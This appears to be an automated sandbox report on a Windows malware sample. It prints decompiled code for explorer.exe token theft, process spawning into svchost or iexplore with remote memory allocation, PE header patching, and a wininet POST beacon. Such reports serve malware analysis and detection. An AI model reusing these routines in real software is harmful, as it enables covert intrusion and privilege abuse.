RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1ABC, Relevance: 6.0, APIs: 4, Instructions: 28 Total matches: 6
synchronizationthread

Similarity

Total matches: 6
API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject
String ID:
API String ID: 1487171737-0
Opcode ID: 113accf1a247a85ca4628c88750f0cdfece1ea245e894959ebf4d1c2d30c192f
Instruction ID: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf
Opcode Fuzzy Hash: 3ED0228D802F0BD0CC5B5047AF2E3320106AB40BDAE1C89703290414816F1FE067EF8D
Instruction Fuzzy Hash: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf

C-Code - Quality: 100%

			E001D1ABC(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					if(_a8 != 0) {
						E001D1E27(_t14, 0x7fffffff);
					}
					E001D1DD4(_t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

0x001d1abd
0x001d1ac3
0x001d1aca
0x001d1ad2
0x001d1ad2
0x001d1ad8
0x001d1add
0x001d1ae5
0x001d1af8
0x001d1b02
0x001d1b02
0x001d1b0e
0x001d1b0e
0x00000000
0x001d1b15
0x001d1b1c

APIs

WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
CloseHandle.KERNEL32(?), ref: 001D1B0E
LocalFree.KERNEL32(?,?), ref: 001D1B15

Part of subcall function 001D1E27: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D1E4D
Part of subcall function 001D1E27: TranslateMessage.USER32(?), ref: 001D1E74
Part of subcall function 001D1E27: DispatchMessageA.USER32(?), ref: 001D1E7E

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Process Name: dRoYbhso1n.exe Analysis ID: 57815

General

Root Process Name:	P8Wo4avJbj.exe
Process MD5:	6EAA1FF5F33DF3169C209F98CC5012D0
Total matches:	88
Initial Analysis Report:	Open
Initial sample Analysis ID:	57815
Initial sample SHA 256:	27DD9DE09E22EFA2EF12E9E2F462FA9DA83684BDB4EC900DD86439C5758107D9
Initial sample name:	dRoYbhso1.exe

Similar Executed Functions

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6
stringfile

Similarity

Total matches: 6
API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen
String ID: dll$exe
API String ID: 1827060118-2048111982
Opcode ID: c3885fe13371a926e81591ffe00ebdc536067f9240e3e9512f9da992c1313499
Instruction ID: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
Opcode Fuzzy Hash: 52F0E98E0D8E83C5D466A3477C95BF311417742D9AD4D97B079D97298F6F12A208EF04
Instruction Fuzzy Hash: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0

C-Code - Quality: 100%

			E00402B08(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t20;
				int _t23;
				int _t24;
				struct HINSTANCE__* _t27;
				void _t30;
				CHAR* _t36;
				long _t42;
				CHAR* _t44;
				void* _t46;

				_t20 = GetModuleFileNameA( *0x405044,  &_v268, 0x104);
				if(_t20 == 0) {
					return _t20;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t44 = _a4;
				lstrcpyA(_t44,  &_v268);
				_t23 = lstrlenA(_t44);
				_t9 = _t44 - 3; // -3
				_t36 = _t23 + _t9;
				_t24 = lstrcmpiA(_t36, _v8); // executed
				if(_t24 != 0) {
					lstrcpyA(_t36, _v8);
					_t24 = CopyFileA( &_v268, _t44, 0); // executed
					if(_t24 != 0) {
						_t24 = CreateFileA(_t44, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t46 = _t24;
						if(_t46 != 0xffffffff) {
							_t27 =  *0x405044; // 0x400000
							_t12 = _t27 + 0x3c; // 0xa8
							_t42 =  *_t12 + _t27 - _t27 + 0x16;
							_a4 = _t42;
							if(_a8 != 0) {
								_t30 = 0;
							} else {
								_t30 = 0x2000;
							}
							_a8 = _t30;
							SetFilePointer(_t46, _t42, 0, 0); // executed
							WriteFile(_t46,  &_a8, 2,  &_a4, 0); // executed
							_t24 = CloseHandle(_t46);
						}
					}
				}
				return _t24;
			}

APIs

GetModuleFileNameA.KERNEL32(?,00000104), ref: 00402B23
lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 00402B59
lstrlenA.KERNEL32(?), ref: 00402B5C
lstrcmpi.KERNEL32(-00000003,004011C8), ref: 00402B6A
lstrcpyA.KERNEL32(-00000003,004011C8), ref: 00402B7C
CopyFileA.KERNEL32(?,?,00000000), ref: 00402B89
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00402BA0
SetFilePointer.KERNELBASE(00000000,00000092,00000000,00000000), ref: 00402BDF
WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 00402BF1
CloseHandle.KERNEL32(00000000), ref: 00402BF8

Strings

exe, xrefs: 00402B3E
dll, xrefs: 00402B35

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6
synchronizationthread

Similarity

Total matches: 6
API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle
String ID:
API String ID: 4158509741-0
Opcode ID: 2ad7749c4b6b29532a42bdd3babab8e75ff4bd89d39d064bb05a7080b22e26a8
Instruction ID: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
Opcode Fuzzy Hash: 1FF02D8822485981C46BAD007CF4FB125448B1765FD98B7143F6D7816F3785B1457F9A
Instruction Fuzzy Hash: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8

C-Code - Quality: 96%

			E00403358() {
				long _v4;
				void* _v8;
				long _t8;
				void* _t10;
				void* _t11;
				void* _t17;
				intOrPtr _t23;
				intOrPtr _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t36;
				intOrPtr _t42;

				_t8 = GetVersion();
				_t42 =  *0x4050b0; // 0x0
				 *0x405070 = _t8;
				if(_t42 == 0 && _t8 < 0) {
					 *0x40506c =  *0x40506c | 0xffffffff;
				}
				_push(_t31);
				_v8 = GetStdHandle(0xfffffff4);
				_t10 = E00402A43(); // executed
				_t36 = _t10;
				if(_t36 == 0) {
					L10:
					_t11 =  *0x40506c; // 0x0
					__eflags = _t11;
					if(_t11 != 0) {
						__eflags = _t11 - 2;
						if(_t11 == 2) {
							L22:
							if(_v8 != 0) {
								CloseHandle(_v8);
							}
							ExitProcess(0);
						}
						__eflags = _t36;
						if(_t36 != 0) {
							L16:
							 *0x4050c8 = CreateEventA(0, 0, 0, 0);
							L17:
							_t33 = CreateThread(0, 0, E00402C05, 0, 0,  &_v4);
							__eflags = _t33;
							if(_t33 != 0) {
								_t17 =  *0x4050c8; // 0x0
								__eflags = _t17;
								if(_t17 != 0) {
									WaitForSingleObject(_t17, 0xffffffff);
									CloseHandle( *0x4050c8);
									 *0x4050c8 = 0;
								}
								WaitForSingleObject(_t33, 0xffffffff);
								CloseHandle(_t33);
							}
							L21:
							E00402FA0(_t30, 0);
							goto L22;
						}
						__eflags = _t11 - 0xffffffff;
						if(_t11 != 0xffffffff) {
							goto L17;
						}
						goto L16;
					}
					__eflags = _t36;
					if(_t36 != 0) {
						goto L16;
					}
					E00401626();
					goto L22;
				}
				_t23 =  *0x4050b4; // 0x1d6000
				 *0x405048 = 0;
				_t46 =  *((intOrPtr*)(_t23 + 0x28));
				if( *((intOrPtr*)(_t23 + 0x28)) != 0) {
					 *0x40506c = 1;
					SetStdHandle(0xfffffff6, _v8);
					goto L10;
				}
				 *0x40506c = 2;
				_t34 = E00402DE5(0, _t31, _t36, _t46);
				_t26 =  *0x4050b4; // 0x1d6000
				 *(_t26 + 0x28) = 1;
				_t27 = E00403094(0, _t30, _t34, _t36, _t46, _t34);
				asm("sbb esi, esi");
				_t36 = 1 +  ~_t27;
				if(_t34 != 0) {
					CloseHandle(_t34);
				}
				if(_t36 != 0) {
					goto L10;
				} else {
					goto L21;
				}
			}

APIs

GetVersion.KERNEL32 ref: 0040335C
GetStdHandle.KERNEL32(000000F4), ref: 00403380

Part of subcall function 00402A43: LoadLibraryA.KERNEL32(?), ref: 00402A6F
Part of subcall function 00402A43: GetCurrentProcessId.KERNEL32 ref: 00402AA1

SetStdHandle.KERNEL32(000000F6,?), ref: 004033F5

Part of subcall function 00402DE5: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00402E03
Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E22
Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E35
Part of subcall function 00402DE5: LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E4A
Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E6D
Part of subcall function 00402DE5: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EAC
Part of subcall function 00402DE5: OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EC5
Part of subcall function 00402DE5: CloseHandle.KERNEL32(00000000), ref: 00402ECC
Part of subcall function 00402DE5: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EF5
Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402F04

Part of subcall function 00403094: GetCurrentProcessId.KERNEL32(00401410,00000184,00403308,00000000,00000001,00000113,?,?,00402421), ref: 004030B4
Part of subcall function 00403094: OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,00402421), ref: 004030C1
Part of subcall function 00403094: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 00403151
Part of subcall function 00403094: SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 00403169
Part of subcall function 00403094: CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00403197
Part of subcall function 00403094: CloseHandle.KERNEL32(00000000), ref: 004031A8
Part of subcall function 00403094: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 004031C8
Part of subcall function 00403094: TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0040322D
Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403236
Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403247
Part of subcall function 00403094: CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 0040326D
Part of subcall function 00403094: SetStdHandle.KERNEL32(000000F6,00000000), ref: 0040327B

CloseHandle.KERNEL32(00000000), ref: 004033DA
ExitProcess.KERNEL32 ref: 00403485

Part of subcall function 00401626: StartServiceCtrlDispatcherA.ADVAPI32(00405034,0040340D), ref: 0040162B

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403421
CreateThread.KERNEL32(00000000,00000000,Function_00002C05,00000000,00000000,?), ref: 0040343A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403458
CloseHandle.KERNEL32 ref: 00403460
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040346B
CloseHandle.KERNEL32(00000000), ref: 0040346E
CloseHandle.KERNEL32(?), ref: 00403482

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Similar Non-Executed Functions

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6
libraryloadermemory

Similarity

Total matches: 6
API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken
String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE]
API String ID: 871439847-2760969069
Opcode ID: 79303f3461f55357ea3caebb2c463ba2263ea78e754b615967e539c6771ee5b5
Instruction ID: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
Opcode Fuzzy Hash: 48F04686904A97F1E623B9C8196D36164553FA17C8E0D8631B21038912B7AF322A7F80
Instruction Fuzzy Hash: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3

C-Code - Quality: 96%

			E001D2DE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t37;
				void* _t38;
				intOrPtr _t40;
				void _t41;
				int _t42;
				struct HINSTANCE__* _t49;
				void* _t50;
				long _t54;
				void* _t58;
				void* _t59;
				void* _t60;

				_push(0x28);
				_push(0x1d1448);
				E001D1637(__ebx, __edi, __esi);
				 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
				_t54 = 0x10000;
				 *(_t60 - 0x24) =  *(_t60 - 0x24) & 0x00000000;
				_t49 = LoadLibraryA("ntdll.dll");
				 *(_t60 - 0x20) = _t49;
				if(_t49 == 0) {
					L17:
					if( *(_t60 - 0x20) != 0) {
						FreeLibrary( *(_t60 - 0x20));
					}
					if( *(_t60 - 0x1c) != 0) {
						LocalFree( *(_t60 - 0x1c));
					}
					return E001D173E( *(_t60 - 0x24));
				}
				_t36 = GetProcAddress(_t49, "NtQuerySystemInformation");
				 *(_t60 - 0x28) = _t36;
				if(_t36 == 0) {
					goto L17;
				}
				_t37 = GetProcAddress(_t49, "_wcsicmp");
				 *(_t60 - 0x2c) = _t37;
				if(_t37 == 0) {
					goto L17;
				}
				while(1) {
					_t38 = LocalAlloc(0x40, _t54);
					 *(_t60 - 0x1c) = _t38;
					if(_t38 == 0) {
						goto L17;
					}
					_t50 =  *(_t60 - 0x28)(5, _t38, _t54, 0);
					if(_t50 != 0xc0000004) {
						if(_t50 < 0) {
							goto L17;
						}
						L8:
						if(_t50 == 0xc0000004) {
							continue;
						}
						_t58 =  *(_t60 - 0x1c);
						 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
						while(1) {
							_t40 =  *((intOrPtr*)(_t58 + 0x3c));
							 *((intOrPtr*)(_t60 - 0x30)) = _t40;
							if(_t40 == 0) {
								goto L14;
							}
							_t42 =  *(_t60 - 0x2c)(_t40, L"explorer.exe");
							if(_t42 != 0) {
								goto L14;
							}
							_t59 = OpenProcess(0x410, _t42,  *(_t58 + 0x44));
							 *(_t60 - 0x34) = _t59;
							if(_t59 != 0) {
								OpenProcessToken(_t59, 0x200ff, _t60 - 0x24);
								CloseHandle(_t59);
							}
							L16:
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							goto L17;
							L14:
							_t41 =  *_t58;
							if(_t41 == 0) {
								goto L16;
							}
							_t58 = _t58 + _t41;
							 *(_t60 - 0x38) = _t58;
						}
					}
					LocalFree( *(_t60 - 0x1c));
					 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
					_t54 = _t54 + _t54;
					goto L8;
				}
				goto L17;
			}

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 001D2E03
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E22
GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E35
LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E4A
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E6D
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EAC
OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EC5
CloseHandle.KERNEL32(00000000), ref: 001D2ECC
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EF5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2F04

Strings

ntdll.dll, xrefs: 001D2DFE
_wcsicmp, xrefs: 001D2E2F
explorer.exe, xrefs: 001D2E94
NtQuerySystemInformation, xrefs: 001D2E16

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5
libraryloader

Similarity

Total matches: 5
API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf
String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE]
API String ID: 3761191649-3458657377
Opcode ID: 2aee25d4d97340da8d57a5187acebaa494bf19f8195fcf1f0a5fcee18dc65b62
Instruction ID: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
Opcode Fuzzy Hash: 3CF04C85081F07F5FC33A941245D77DE780BF95AC2DCCF9155622D6A235A4D32189741
Instruction Fuzzy Hash: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc

C-Code - Quality: 94%

			E001D2CC7(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v40;
				signed int _t30;
				_Unknown_base(*)()* _t32;
				signed int _t34;
				signed int _t35;
				intOrPtr* _t36;
				signed int _t43;
				void* _t51;
				signed int* _t54;

				_v8 = 0x4e20;
				_t30 = LoadLibraryA("wininet.dll");
				_t54 = _a4;
				_t54[0xd] = _t30;
				if(_t30 != 0) {
					_a4 =  &(_t54[3]);
					_t51 = 0;
					while(1) {
						_t6 = _t51 + 0x1d500c; // 0x1d12c8
						_t32 = GetProcAddress(_t54[0xd],  *_t6);
						 *_a4 = _t32;
						if(_t32 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t51 = _t51 + 4;
						if(_t51 < 0x28) {
							continue;
						}
						_t35 = _t54[3]("Mozilla/4.0 (compatible; MSIE 6.0;)", 0, 0, 0, 0);
						 *_t54 = _t35;
						if(_t35 != 0) {
							if(_a16 != 0) {
								_t36 = _a12;
								_push( *_t36);
								L001D3826();
							} else {
								_t36 = _a8;
							}
							_t35 = _t54[4]( *_t54, _t36, 0x50, 0x1d1369, 0x1d1369, 3, 0, 0);
							_t54[1] = _t35;
							if(_t35 == 0) {
								goto L6;
							} else {
								_t35 = _t54[9](_t35, "POST", 0x1d1369, 0, 0, 0, 0x84400100, 0);
								_t54[2] = _t35;
								if(_t35 == 0) {
									goto L6;
								}
								_t54[5](_t35, 2,  &_v8, 4);
								_t54[5](_t54[2], 5,  &_v8, 4);
								wsprintfA( &_v40, "%s: 0\r\n", "TagId");
								_t43 = _t54[7](_t54[2],  &_v40, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t34 = ( ~_t43 & 0x00000002) - 1;
								L14:
								return _t34;
							}
						}
						L6:
						_t34 = _t35 | 0xffffffff;
						goto L14;
					}
					FreeLibrary(_t54[0xd]);
					_t54[0xd] = 0;
					_t34 = 0;
					goto L14;
				}
				return _t30 | 0xffffffff;
			}

APIs

LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
FreeLibrary.KERNEL32(?), ref: 001D2D3F
inet_ntoa.WSOCK32(?), ref: 001D2D5E
wsprintfA.USER32 ref: 001D2DBF

Strings

%s: 0, xrefs: 001D2DB9
N, xrefs: 001D2CD4
POST, xrefs: 001D2D87
Mozilla/4.0 (compatible; MSIE 6.0;), xrefs: 001D2D26
TagId, xrefs: 001D2DB1
wininet.dll, xrefs: 001D2CCF

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6
processthread

Similarity

Total matches: 6
API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess
String ID:
API String ID: 3127335161-0
Opcode ID: d2529c531e04d4ae067d5c82a3609593e1c0a8b50e4b57957b408f9e477c39a1
Instruction ID: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
Opcode Fuzzy Hash: D411598B4588D5B3C8C3B9583C0AB24D4A1EF4A9E5CAD6325B0B9596C44B49390ADF89
Instruction Fuzzy Hash: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f

C-Code - Quality: 96%

			E001D3094(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t112;
				struct _STARTUPINFOA _t116;
				void** _t117;
				void* _t120;

				_t112 = __ecx;
				_push(0x184);
				_push(0x1d1410);
				E001D1637(__ebx, __edi, __esi);
				 *(_t120 - 0x1c) = 0;
				 *((intOrPtr*)(_t120 - 0x38)) = 0;
				 *((intOrPtr*)(_t120 - 0x3c)) = 1;
				 *(_t120 - 4) = 0;
				_t109 = OpenProcess(0x1f0fff, 1, GetCurrentProcessId());
				 *((intOrPtr*)(_t120 - 0x40)) = _t109;
				if(_t109 == 0) {
					goto L28;
				} else {
					_t116 = 0x44;
					E001D384D(_t120 - 0x90, 0, 1);
					 *(_t120 - 0x90) = _t116;
					 *((short*)(_t120 - 0x60)) = 0;
					 *((intOrPtr*)(_t120 - 0x64)) = 0x181;
					 *((intOrPtr*)(_t120 - 0x50)) = _t109;
					while(1) {
						 *(_t120 - 0x24) = 0;
						if( *((intOrPtr*)(_t120 - 0x3c)) == 0 || E001D3734(_t112, _t120 - 0x194, 0x104) == 0) {
							E001D2B08(_t120 - 0x194, 1);
						} else {
							 *(_t120 - 0x24) = 4;
						}
						if( *(_t120 + 8) == 0) {
							goto L12;
						}
						_t117 = _t120 + 8;
						 *(_t120 - 0x48) = _t117;
						 *(_t120 - 0x20) = 0;
						if(DuplicateTokenEx( *(_t120 + 8), 0x2000000, 0, 0, 1, _t120 - 0x20) != 0) {
							 *(_t120 - 0x44) = 0;
							if(SetTokenInformation( *(_t120 - 0x20), 0xc, _t120 - 0x44, 4) != 0) {
								_t117 = _t120 - 0x20;
								 *(_t120 - 0x48) = _t117;
							}
						}
						 *(_t120 - 0x1c) = CreateProcessAsUserA( *_t117, 0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						if( *(_t120 - 0x20) != 0) {
							CloseHandle( *(_t120 - 0x20));
						}
						L13:
						if(( *(_t120 - 0x24) & 0x00000004) == 0) {
							L23:
							__eflags =  *(_t120 - 0x1c);
							if( *(_t120 - 0x1c) == 0) {
								L26:
								SetStdHandle(0xfffffff6, 0);
								E001D2965(0,  *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
								L28:
								_t66 = _t120 - 4;
								 *_t66 =  *(_t120 - 4) | 0xffffffff;
								__eflags =  *_t66;
								E001D32B0(0);
								return E001D173E( *(_t120 - 0x1c));
							}
							L24:
							__eflags =  *0x1d506c; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							 *((intOrPtr*)(_t120 - 0x38)) = CreateThread(0, 0, E001D2965,  *(_t120 - 0x34), 0, _t120 - 0x4c);
							goto L28;
						}
						if( *(_t120 - 0x1c) == 0) {
							L18:
							if( *((intOrPtr*)(_t120 - 0x3c)) == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t120 - 0x3c)) = 0;
							if( *(_t120 - 0x34) != 0) {
								TerminateProcess( *(_t120 - 0x34), 0);
								CloseHandle( *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
							}
							if( *(_t120 - 0x30) != 0) {
								CloseHandle( *(_t120 - 0x30));
								 *(_t120 - 0x30) = 0;
							}
							continue;
						}
						E001D2B08(_t120 - 0x194, 0);
						_t101 = E001D3683(_t112, _t120 - 0x194,  *(_t120 - 0x34), 0);
						 *(_t120 - 0x1c) = _t101;
						if(_t101 != 0) {
							_t103 =  *0x1d50b4; // 0x0
							E001D3020(_t112,  *(_t120 - 0x34),  *((intOrPtr*)(_t103 + 0x34)), 0, 0, _t120 - 0x1c, 0);
						}
						if( *(_t120 - 0x1c) != 0) {
							goto L24;
						} else {
							goto L18;
						}
						L12:
						 *(_t120 - 0x1c) = CreateProcessA(0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						goto L13;
					}
				}
			}

APIs

GetCurrentProcessId.KERNEL32(001D1410,00000184,001D3308,00000000,00000001,00000113,?,?,001D2421), ref: 001D30B4
OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,001D2421), ref: 001D30C1

Part of subcall function 001D3734: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
Part of subcall function 001D3734: lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
Part of subcall function 001D3734: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
Part of subcall function 001D3734: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
Part of subcall function 001D3734: RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9

Part of subcall function 001D2B08: GetModuleFileNameA.KERNEL32(?,00000104), ref: 001D2B23
Part of subcall function 001D2B08: lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 001D2B59
Part of subcall function 001D2B08: lstrlenA.KERNEL32(?), ref: 001D2B5C
Part of subcall function 001D2B08: lstrcmpiA.KERNEL32(-00000003,001D11C8), ref: 001D2B6A
Part of subcall function 001D2B08: lstrcpyA.KERNEL32(-00000003,001D11C8), ref: 001D2B7C
Part of subcall function 001D2B08: CopyFileA.KERNEL32(?,?,00000000), ref: 001D2B89
Part of subcall function 001D2B08: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001D2BA0
Part of subcall function 001D2B08: SetFilePointer.KERNEL32(00000000,00000092,00000000,00000000), ref: 001D2BDF
Part of subcall function 001D2B08: WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 001D2BF1
Part of subcall function 001D2B08: CloseHandle.KERNEL32(00000000), ref: 001D2BF8

DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 001D3151
SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 001D3169
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 001D3197
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 001D31C8

Part of subcall function 001D3683: VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
